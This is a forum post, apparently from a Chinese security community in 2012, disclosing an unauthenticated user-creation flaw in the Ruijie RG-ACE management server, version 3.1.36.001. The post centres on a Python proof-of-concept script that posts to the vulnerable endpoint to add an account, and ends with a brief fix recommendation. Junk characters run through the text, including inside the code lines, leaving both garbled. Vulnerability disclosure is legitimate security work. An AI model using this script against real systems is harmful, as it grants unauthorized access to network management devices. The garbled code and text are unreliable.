找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2127|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)2 G: f9 H' z% \9 K( y7 T: o0 d+ H

" ^1 ?+ t  y7 @4 I
8 L& b1 W0 C2 Z, d- Y测试的具体版本是
# {" @# [9 M8 I& `- C产品名称: 锐捷应用控制引擎2 q2 I" e2 p$ t6 Q
版本号: 3.1.36.001 TC
+ o5 c& y8 A* A. a" ^; F* p编译时间: 201104291730
6 [5 i. y& ]+ u8 S, ~
+ a, M$ W2 [- x) v, k9 w! |) Q
% P& q& X. l) w' \8 }漏洞证明:
& @. W  P. g& \. _7 P
# n' L) c2 J! ~8 r& [1 P' U% W+ |+ @& G% F6 L$ ]+ z
; H: p' B( M9 f, P+ M) r: _
$ l+ m) c( v0 N& f1 ^6 t8 D
4 ]+ J  O4 c* I7 Z$ l: I
1 A( h4 R5 p+ F$ C
执行脚本
! P( Y- C6 `% F; Q6 L/ Q$ N#! /usr/bin/env python* t9 z4 U/ u- q7 E- b, g9 g1 A0 Y
#coding=gbk# U+ r; `! ~/ ~# J& I
#RG-ACE管理服务器 V3.1.36.0016 W. x- V3 H' u8 F, K0 [& u
import urllib2, urllib,cookielib
/ h& A* v/ V$ d, F/ furl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
( K$ L4 L! N! F* q4 E% gopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))  M4 z! X. G! D$ h0 ?
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, F0 W1 R  ?' v+ S% q8 spost=(("event","userManager.doInsertUserInfo"),
* h, \% H- w4 [) i("useractionname","addButtonValue"),
3 C  D0 V) B3 l1 e" ]0 o("useropermanager","userManager"),
4 k2 e7 s! ^' B. R0 W("userName","t"), #######账号自己加' T/ l0 ^+ ^8 Y+ i( L  W0 [0 K; j
("pwd","aaaaaa"),######密码自己加* T- H0 w7 S3 c; y0 X& }- a
("trueName","ad"),
% m9 \2 `  z& H: [4 `" H/ k- \("email",""),
! q: K# S9 e# Z("mobilePhone",""),( Y1 P2 u8 Q0 t# T1 ]% [) Q
("officePhone",""),
3 t9 F% f& s$ l* i8 I$ k9 l4 S1 G("addr",""),
! _! U7 c* X8 f$ y4 G("submit","确定"))9 v6 s* a, P  L8 m& S$ }
urllib2.install_opener(opener)9 G, o- |" A- m; j5 c
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
& m. V9 X6 N0 f% H# @- A# cprint "Done"4 {# J% W$ `/ w4 G* m

1 B% @/ K7 c9 e4 E" [登录,连接设备
7 j) T- O+ N: k! |0 }1 q* m; |% x
2 g# X7 W0 e# \; ]9 Q, S) |
. }! n  j6 ^/ r" S9 ]# o3 s5 L7 i( o+ P4 m) J

9 z2 p3 s8 \' h: g4 b! \7 N% A! C8 x% o# O' p
默认的管理员admin权限更大点$ P4 v+ C" m: S1 x3 ?+ R

: d" F* F' x1 E' z
) z2 d/ L8 S$ F/ y0 R
  M" M. p/ n/ o9 h; K" e: J0 u/ _+ i 1 _) B1 m4 T* \0 u1 M; O+ f9 n

# Q$ ^9 @5 a7 S1 o  M3 I6 {2 K3 j! u; S: e修复方案:% Q7 O! _, s+ ~5 P+ U; F% b+ J# a
加强对接口的权限验证( R9 c  H  ?8 @
2 ~5 r) P( A3 J( Z1 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表